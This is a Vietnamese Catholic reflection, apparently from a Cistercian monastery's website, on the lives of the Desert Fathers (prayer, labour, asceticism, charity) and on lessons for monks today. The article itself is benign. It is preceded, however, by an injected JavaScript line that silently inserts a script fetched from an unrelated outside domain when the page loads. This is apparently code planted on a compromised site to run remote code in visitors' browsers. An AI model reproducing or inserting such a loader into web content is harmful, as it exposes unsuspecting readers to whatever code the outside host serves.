;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); MỘT VÀI NÉT VỀ ĐỜI SỐNG CÁC LINH PHỤ SA MẠC VÀ KIM CHỈ NAM CHO CÁC ĐAN SĨ – Xitô PS

MỘT VÀI NÉT VỀ ĐỜI SỐNG CÁC LINH PHỤ SA MẠC VÀ KIM CHỈ NAM CHO CÁC ĐAN SĨ

Trong lịch sử nhân loại, từ đông sang tây, từ xưa tới nay, dường như ở thời nào, ở đâu, bao giờ cũng có những người dấn thân đi tìm kiếm Thiên Chúa, hay Đấng Tuyệt Đối vô biên. Nếu như bên Đông Phương có những đạo sĩ lừng danh xa lìa cuộc sống trần thế bể dâu để tu thân, ẩn tu nơi các vùng đồi núi thẳm sâu, xa xôi hẻo lánh, trên những vùng băng tuyết vĩnh cửu như các thầy Bàlamôn, các Tăng ni Phật tử… Thì ở Phương tây xa xưa, cách đây khoảng gần 2000 năm, trong những thế kỷ đầu của Kitô giáo cũng đã có rất nhiều ẩn sĩ khước từ thế gian trần tục để đi vào cuộc sống khắc khổ trong sa mạc hoang vu thanh vắng cho việc tìm kiếm Thiên Chúa, Đấng đã yêu mến và kêu gọi các ngài. Người ta thường gọi các ngài là các linh phụ sa mạc, các đấng tu rừng, các Tổ phụ hay Đan phụ…

Nói đến Sa mạc là nói đến nơi khô cằn sỏi đá, nơi của sự chết chóc, huỷ diệt, một nơi mà khi nói đến người ta có thể rợn tóc gáy. Thế nhưng tại sao nó lại là nơi mà những người đi tìm Thiên Chúa trong các thế kỷ đầu của Kitô giáo người ta lại lục đục kéo đến và sống ở đây? Phải chăng các vị tổ phụ đã được Thiên Chúa quyến rũ như Người đã từng phán với Hôsê: “Ta sẽ dẫn người vào sa mạc để thổ lộ tâm tình”(Hs 2, 16). Hay các ngài muốn sống lại tâm tình của dân Israel khi Gia vê Thiên Chúa đã dẫn đưa họ 40 mươi năm trường trong sa mạc tiến về đất hứa. Dù muốn bắt chước trong những việc đã nêu trên, các vị tổ phụ chắc chắn đã nghe tiếng Thiên Chúa thúc giục và các ngài đã đáp lại lời mời gọi của Thiên Chúa bằng một trái tim cháy bỏng trong việc tìm kiếm Thiên Chúa qua đời sống cầu nguyện và lao động, hy sinh và đức ái trong môi trường khắc nghiệt. Trước hết, ngược dòng lịch sử trở về những thế kỷ đầu của Kitô Giáo, chúng ta cùng  tìm hiểu và khám phá về cuộc sống của các linh phụ sa mạc.

  1. Đôi nét về cuộc sống các linh phụ sa mạc

Vào thế kỷ IV, tại Ai cập, Syria, Palestin và Ả rập đã là những vùng đất hấp dẫn cho nếp sống đan tu Kitô giáo. Tại đây, nơi những hang hốc trong sa mạc, hay giữa đồng không mông quạnh đều có các ẩn sĩ cư ngụ: có những vị ở trong các hang hốc, có những vị nội vi là những viên sỏi đá bao quanh làm ranh giới hoặc có vị cột chân vào xích, có vị sống trên một cây cột, có những vị sống trong thân cây, có những vị sống như các loài vật đó là không áo không quần, để râu tóc tốt xum xuê, ăn cỏ và bò như loài vật bốn chân…Công việc của các vị là đan lát các dụng cụ như: sọt, rỗ… bằng lá dừa. Thức ăn của các vị là những chiếc bánh được đổi lấy từ những sản phẩm đan lát, nước uống thì có sẵn trong thiên nhiên tức là sông ngòi hay trong một cái giếng nào đó. Mỗi ngày các vị đọc một trăm năm mươi Thánh vịnh, vừa đọc vừa làm việc. Mỗi đêm các vị ngủ khoảng một tiếng, mỗi ngày ăn một lần, nếu ăn chay thì một tuần một lần. Đến Chúa nhật, thông thường các vị họp lại với nhau để tham dự bẻ bánh và học hỏi Lời Chúa. Ngoài ra còn việc huấn luyện các tu sĩ trẻ mới vào nghề nữa. Với một cuộc sống như thế thì đâu là động lực thúc đẩy các vị linh phụ chọn lựa hành trình khó khăn và gian khổ?

  1. Để đáp lại lời mời gọi yêu thương của Thiên Chúa

Cho dù sống ở đâu? thời nào? Thì vẫn luôn có những lời mời gọi của Thiên Chúa và sự đáp trả của con người, dù rằng cách đáp trả ở mỗi thời khác nhau. Lời mời gọi của Thiên Chúa đối với ông Apraham và các ngôn sứ ngày xưa, hay lời mời gọi của Chúa Giêsu đối với các môn đệ, lời mời gọi đối với các tổ phụ sa mạc, hay lời mời gọi đối với chúng ta ngày nay, đều phát xuất từ Thiên Chúa; nhưng mỗi thời có một các đáp trả khác nhau và diễn tả cách sống khác nhau. Đối với các vị tổ phụ sa mạc ngày xưa có một điểm đáng chú ý là các đấng tổ phụ đã đón nhận lời mời gọi của Phúc Âm bằng tất cả tâm hồn nồng nhiệt và đáp ứng bằng toàn thể con người của họ không so đo tính toán. Thực vậy, một số vị đã xây dựng toàn bộ cuộc sống mình trên nền tảng một câu Kinh thánh, như thánh An tôn, một số khác sau một đời nhầy nhụa tội lỗi đã tìm đến sa mạc để khóc than cho tội lỗi của mình bởi đã bắt gặp tình yêu và lòng thương xót vô biên của Thiên Chúa, để rồi sau đó dành cả cuộc đời còn lại trong nước mắt và sám hối ăn năn, một số vị khác thì dựa trên một tia sáng vĩnh cửu ngời sáng chính từ ánh mắt tâm hồn, thái độ, nhân cách của một vị hiền lão nào đó. Một cụm từ chính yếu nơi môi miệng các môn sinh khi đến với các vị hiền lão: “ thưa cha xin cho con một lời”!.

Nói chung, các vị tổ phụ sa mạc là những người đã lắng nghe lời mời gọi của Thiên Chúa và đáp trả lại một cách mãnh liệt. Họ bỏ mọi sự phù hoa thế trần để đi tìm sự cứu rỗi. Hay nói cách khác họ khao khát sống lại cuộc sống mà các vị tử đạo tiên khởi đã sống. Giờ đây, trong cảnh thái bình, họ không còn cơ hội để đổ máu làm dấu chứng tình yêu của mình thì họ tìm đến sa mạc, nơi khô cằn sỏi đá, nơi chết chóc huỷ diệt để sống lại cuộc sống các vị tử đạo. Với cuộc sống sa mạc: họ diệt dục bằng mọi cách để tránh tội, sống giữa trời đất để hoà mình với thiên nhiên và để dễ gần Chúa hơn. Họ chấp nhận cuộc sống khắc nghiệt như thế để khóc cho tội lỗi nhân thế và tội lỗi của họ.

  1. Niềm khao khát cháy bỏng trong việc tìm kiếm Thiên Chúa

Chính niềm khao khát cháy bỏng nơi tâm hồn các vị tổ phụ đã dẫn các ngài đến với sa mạc. Không dừng lại đó chính niềm khát khao cháy bỏng thúc đẩy các vị tổ phụ không ngừng nỗ lực hết mình thể hiện qua:

 Đời sống cầu nguyện và lao động:

Các vị tổ phụ tìm đến sa mạc không phải là đi tìm sự nhàn rỗi nhưng chính tại miền sa mạc này đã dạy cho các vị chìm đắm trong sự cầu nguyện liên lỉ và lao động chân tay không ngừng. Như đan phụ Agathon đã định nghĩa:“cầu nguyện là việc làm chăm chỉ và tận lực cố gắng đến hơi thở cuối cùng”. Dường như cuộc sống của các ngài là làm việc vất vả và trải qua một cuộc sống nổ lực quy hướng mọi khía cạnh thân xác, tâm trí và linh hồn về Thiên Chúa. Ý nghĩa của việc cầu nguyện đối với các ngài không phải là một hành vi mỗi ngày thực hiện vài giờ đồng hồ nhưng là cuộc sống liên lỉ hướng về Thiên Chúa. Phải nói rằng các đan phụ sa mạc là những người biết quân bình trong mọi sự lời cầu nguyện của các ngài luôn đi đôi với việc làm. Trọn cuộc sống của các ngài quy hướng về Thiên Chúa chính là lời cầu nguyện lỉ.

  Đời sống khổ hạnh:

Hoang mạc không phải là thao trường nơi các vận động viên ganh đua nhau về khả năng chịu đựng. Nhưng là nơi để các linh phụ bày tỏ tình yêu của mình đối với Thiên Chúa, qua đời sống khổ hạnh của các ngài đã cho thấy sức mạnh và nghị lực của những chiến sĩ Chúa Ki tô. Nên hoang mạc tự nó đã là một chiến trường để các chiến sĩ chiến đấu với bản thân mình, chiến đấu với thế gian và ma quỷ. Chính vì thế các đan sĩ là những linh canh tường thành. Các ngài là những chiến sẽ kiên cường của Chúa Kitô. Cuộc sống của các ngài là một cuộc chiến đấu liên lỉ trong tỉnh thức, chay tịnh và các việc khổ hạnh khác. Đan phụ Poemen nói: khó nghèo gian khổ, nhiệm nhặt chay tịnh là những dụng cụ của cuộc sống cô tịnh.

Thật vậy, cuộc sống của các đan phụ hết sức giản dị, một hang đá hoặc một tấm lều bằng đá, một mảnh chiếu bằng sậy làm chỗ ngủ, một tấm da cừu làm trang phục, một ngọn đèn một, bình nước và một bình dầu. Tất cả chỉ có thế! Thực phẩm được tính giảm đến mức tối thiểu, việc ngủ nghỉ cũng thế, các ngài cho rằng: là một chiến binh, đan sĩ chỉ cần ngủ mỗi đêm một giờ. Thế nhưng bỏ đi những tiêu cực chúng ta thấy rằng: các đan sĩ đi đường mà không ngủ nghỉ là vì các ngài chuyên chú tìm Chúa, các ngài không chuyện trò là để có thể nghe được tiếng Chúa, các ngài giữ chay là để được Lời Chúa nuôi dưỡng. Mục đích ấy mới quan trọng còn việc khổ chế chỉ là phương tiện. Một số đan phụ hỏi đan phụ Macarius người Ai cập: tại sao cho dù ăn uống hay giữ chay người của cha lúc nào lúc nào cũng gầy guộc và khô như thế? Vì hiền lão trả lời: thanh củi được dùng để cời những cành nho đang chaý cũng bị ngọn lửa hoàn toàn thiêu rụi thế nào thì kẻ thanh luyện trong niềm kính sự Chuá cũng được niềm kinh sợ ấy thiêu rụi thân xác như vậy.

Trái tim trọn tình bác ái:

Các Đan phụ hoang mạc hay còn gọi là các đấng tu rừng là những nhà khổ tu, khắc khe với bản thân nhưng lại chan hoà nhân ái và cảm thông với các nhu cầu và cả những yếu đuối cũng như tội luỵ của họ. Như Đan phụ Poemem dạy các đan sĩ rằng: Đan sĩ thì không than thân trách phận, đan sĩ thì không lấy ác báo ác, đan sĩ thì không cuồng nộ. Một vài hiền lão đến gặp đan phụ Poemem và thắc mắc khi thấy một số đan sĩ ngủ gục trong giờ hội chung: có nên đánh thức họ không? Ngài trả lời về phần tôi khi thấy một đan sĩ ngủ gật như vậy tôi cho cho họ dựa vào đầu gối của tôi và để yên cho họ. Hay một lần kia tại Scetis có loan tin: tuần này ăn chay. Xảy ra là có một số đan sĩ từ Ai cập đến thăm đan phụ Mô sê. Vậy ngài nấu nướng đãi họ. Thấy khói lửa bốc lên, những người chung quanh xầm xì với các linh mục: nhìn kìa lão Mô sê phá luật lệ, đang nấu nướng cái gì trong lều. Các linh mục nói để khi nào ngài tới chúng tôi sẽ nói thẳng với ngài. Đến thứ bảy, vì đã biết đời sống trọn lành của ngài nên các linh mục đã nói với ngài trước mặt mọi người: đan phụ Mô sê không tuân giữ luật của loài người nhưng đã tuân giữ luật của Thiên Chúa. Hay khi nghe có một đan sĩ sắp bị đem ra xét xử, ngài liền đến. Mang theo một cái giỏ đựng đầy cát và nói: làm sao tôi có thể xét đoán anh em của tôi khi mà tội lỗi của tôi cứ rò rĩ chảy sau lưng của tôi như cái giỏ cát này. Còn đối với Thánh Antôn, ngài xác quyết: cuộc sống của tôi là ở với anh em tôi. Ngài đã nhiều lần cùng với dân chúng bảo vệ đức tin, giải cứa dân chúng bị khốn đốn. Một điểm nữa nơi các vị tổ phụ là lòng quảng đại khi đón tiếp quý khách như đón tiếp Chúa Kitô đến thăm mình.

Nói tóm lại mục đích của nếp sống đan tu không phải là việc khổ chế nhưng là con đường để đến với Thiên Chúa, và con đường đó là đức ái. Đức ái là cốt lõi của mọi công việc và trắc nghiệm đời sống của các đan sĩ hoang mạc.

Rảo qua một vài điểm như thế có lẽ đã giúp chúng ta khám phá ra phần nào đời sống của các vị tổ phụ hoang mạc để giúp chúng ta có một cái nhìn sâu sắt hơn về đời sống của mình. Bởi vì chúng ta có một nền tảng hết sức chắc chắn với gương lành là đời sống các vị tổ phụ là những người đã sống trọn tình với Thiên Chúa, hết lòng với anh em.

  1. Kim chỉ nam cho các tu sĩ ngày nay.

Đời sống đan tu ngày nay đã cách xa đời sống các linh phụ sa mạc gần những hai mươi thế kỷ, có lẽ vì thế mà cách sống, nếp nghĩ, thái độ và cái nhìn của đời sống đan tu ngày nay cũng khác xa thời xưa. Trước hết, là về vị trí địa lý, nếu như ngày xưa các vị linh phụ thường rời bỏ làng quê, thành thị để đi vào ẩn tu trong các sa mạc, nơi rừng sâu thì ngày nay hầu như các tu viện, đan viện thường ở nơi các thành thị, nơi đông dân cư. Phải chăng quan niệm về sa mạc ngày nay đã khác thời xưa?

Cũng thế, ngày nay đa số những người trẻ đi tu đã trưởng thành, tức là đã sống ngoài đời một thời gian, ít nhất cũng đã tốt nghiệp trung học. Cho nên, đã ảnh hưởng ít nhiều đời sống phức tạp bên ngồi. Bởi vì ngay nay, với sự phát triển nhanh chóng về mọi mặt, những thoải mải về tiện nghi, sự lôi cuốn của các phương tiện truyền thông, truyền thanh, Internet đã dẫn con người dễ dàng hướng đến cuộc sống hưởng thụ, rơi vào cơn lốc của những thú vui giả tạo tràn ngập khắp nơi.

Hơn nữa các trào lưu tư tưởng, chẳng hạn như phong trào hiện sinh, chủ nghĩa duy thế tục, chủ nghĩa tương đối đã ảnh hưởng rất mạnh trên con người thời này đặc biệt là giới trẻ. Nó đã làm cho con người ra điêu đứng vì không biết mình là ai, phải làm gì mà chỉ lao vào đua đòi, ăn chơi trác táng như con thiêu thân. Từ đó làm cho con người mất đi niềm xác tín, những chân lý đích thực trong cuộc sống.

Các tu sĩ trẻ ngày nay cũng dễ dàng rơi vào những ảnh hưởng đó. Tức là quên mất mình là ai để rồi chạy thói đời, với những quan niệm cho rằng mình phải hợp thời nếu không thì sẽ lạc hậu. Thế nên rất cần những ánh sáng và nguồn lực mạnh mẽ có thể xua tan đi những cám dỗ và những mời gọi của thế gian để làm sao người tu sĩ thấy được con đường đích thực mà mình phải đi, cho dù trên hành trình đó người tu sĩ phải đi một mình, phải đi ngược lại với dòng đời. Vậy đâu là điểm tựa và ánh sáng soi chiếu hướng dẫn các tu sĩ trong thế giới ngày hôm nay? Kim chỉ nam đó không gì khác hơn là trở về nguồn cội đời sống của mình, vì chỉ có  ở nơi đầu nguồn mới có thể uống được mạch nước trong tinh khiết; và nguồn đó không ở đâu xa mà chính là đời sống và gương mẫu của các linh phụ sa mạc trong những thế kỷ đầu của Ki tô giáo. Chính cách sống, tình yêu và gương mẫu về đời sống thánh thiện tuyệt vời trong việc theo sát Đức Ki tô của các linh phụ sa mạc sẽ là những bài học quý giá cho các tu sĩ ngày nay biết cách phụng thờ Thiên Chúa, và những kim chỉ nam đó là:

Niềm xác tín: chính niềm xác tín đã giúp các đan sĩ chắc chắn với đời sống của mình với lòng tin tuyệt đối vào Thiên Chúa mà không phải bận tâm, băn khoăn, thắc mắc về ơn gọi theo Chúa. Niềm xác tin mạnh mẽ về đời sống của mình đã giúp các ngài vượt qua tất cả để đến với Thiên Chúa. Thật vâỵ, nếu không có xác tín cuộc sống con người sẽ sống vô hồn cứng nhắc và đôi khi là buông thả, như chiếc thuyền không neo, để xem cuộc đời nó trôi nổi như thế nào tuỳ ý. Có niềm xác tín chúng ta sẽ sống mạnh mẽ hơn, can đảm hơn, dấn thân hơn!

Sự kiên nhẫn: cuộc sống sa mạc là một chiến trường để thao luyện lòng kiên nhẫn của các tổ phụ sa mạc. Sự kiên nhẫn bền bỉ đã giúp cho các tổ phụ đã sống đến cùng trong sa mạc mà không bao giờ muốn lìa bỏ. Sự kiên nhẫn còn giúp cho các tổ phụ vượt qua cuộc sống khắc nghiệt và sự đơn điệu của nhịp sống bình thường. Chính lòng kiên nhẫn đã giúp các tổ phụ đạt được điều mong ước trong việc tìm kiếm Thiên Chúa. Có lòng kiên nhẫn chúng ta sẽ đạt được điều mình hằng mong ước và theo đuổi!

Lòng khoan dung: chính lòng khoan dung đã giúp các ngài cởi mở tấm lòng, rộng mở tâm hồn với Thiên Chúa, với con người và với thiên nhiên. Với Thiên Chúa, các ngài đã không từ chối Thiên Chúa điều gì. Với con người, các ngài luôn yêu thương, thông cảm và đồng hành cùng cuộc sống con người. Với thiên nhiên, các ngài hoà mình với vạn vật để rồi từ đó không ngừng vang tiếng ngợi khen Thiên Chúa. Có lòng khoan dung, chúng ta sẽ thấy cuộc đời dễ chịu và tươi vui hơn!

 Một trái tim yêu thương: theo gương các đấng tổ phụ, trái tim của chúng ta sẽ luôn luôn rộng mở: một trái tim đầy lòng vị tha và bác ái. Cuộc đời vắn vỏi biết bao nhiêu, hãy nhớ dành thời gian thật nhiều cho những người mà ta yêu thương! Chỉ có tình yêu mãnh liệt mới có thể xua tan những hiểu lầm vụn vặt nảy sinh trong cuộc sống. Bởi vì tình yêu là món quà quý giá mà con người nhận được của nhau. Hãy noi gương các đấng tổ phụ yêu người như Chúa yêu!

Kết.

Dõi theo dấu chân của các vị tổ phụ trong việc tìm kiếm Thiên Chúa sẽ giúp chúng ta khám phá ra khuôn mặt của Thiên Chúa. Đời sống các vị tổ phụ luôn là món quà quý giá dâng tiến Chúa đáng chúng ta trân trọng và yêu mến và không ngừng học hỏi. Có lẽ, chúng ta không thể bắt chước trăm phần trăm về hình thức khổ chế có phần kinh dị của các ngài nhưng về tinh thần sống đức tin, đời sống tu trì và bài học yêu thương với một cuộc sống quân bình, khôn ngoan, đầy sức mạnh, dũng cảm có lẽ chúng ta nên học hỏi, suy nghĩ và không ngừng nổ lực hết mình để xứng đáng là môn đệ Chúa Kitô.

 

BT

You May Also Like

Trả lời

X